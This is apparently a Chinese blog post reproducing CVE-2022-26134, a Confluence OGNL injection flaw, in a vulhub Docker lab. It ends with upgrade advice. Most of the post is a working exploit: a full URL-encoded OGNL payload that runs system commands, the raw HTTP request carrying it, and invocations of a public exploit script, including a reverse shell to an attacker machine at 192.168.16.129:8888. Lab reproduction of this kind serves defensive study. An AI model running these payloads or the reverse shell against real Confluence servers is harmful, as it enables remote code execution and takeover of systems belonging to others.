CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 安全版本:

0x06 环境搭建:

下载vulhub:

解压进入目录:

配置Confluence:

打开url:

获取授权&配置文件:

0x07 漏洞复现:

Burp:

修改请求:

POC:

执行POC:

反弹shell:

0x08 流量分析:

Burp:

POC:

反弹shell:

0x09 修复建议:


0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

0x03 漏洞概述:

2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134,漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。

0x04 影响版本:

目前所有未安装最新补丁的 Confluence 都受到该漏洞影响,建议尽快升级到安全版本

0x05 安全版本:

Confluence Server 7.4.17

Confluence Server 7.13.7

Confluence Server 7.14.3

Confluence Server 7.15.2

Confluence Server 7.16.4

Confluence Server 7.17.4

Confluence Server 7.18.1

0x06 环境搭建:

下载vulhub:

下载地址:

https://github.com/vulhub/vulhub

解压进入目录:

/vulhub/confluence/CVE-2022-26134

执行:

docker-compose up -d

配置Confluence:

打开url:

http://192.168.16.130:8090

获取授权&配置文件:

(期间有个注册过程)

 这里选择集群

Hostname:db

Port:5432

Database name:confluence

Username:postgres 

Password:postgres

0x07 漏洞复现:

Burp:

修改请求:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: 192.168.16.130:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

POC:

执行POC:

下载地址:

https://github.com/0x14dli/cve2022-26134exp
python CVE-2022-26134.py -u http://192.168.16.130:8090 -c whoami

反弹shell:

python CVE-2022-26134.py -u http://192.168.16.130:8090/ -i 192.168.16.129 -p 8888

0x08 流量分析:

Burp:

(和POC的流量没什么区别)

POC:

反弹shell:

无回显内容,所以X-Cmd-Response无内容。(此处回显是脚本显示并非服务端回显)

0x09 修复建议:

对 Confluence 组件进行集中升级到安全版本

下载地址为

https://www.atlassian.com/software/confluence/download-archives

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值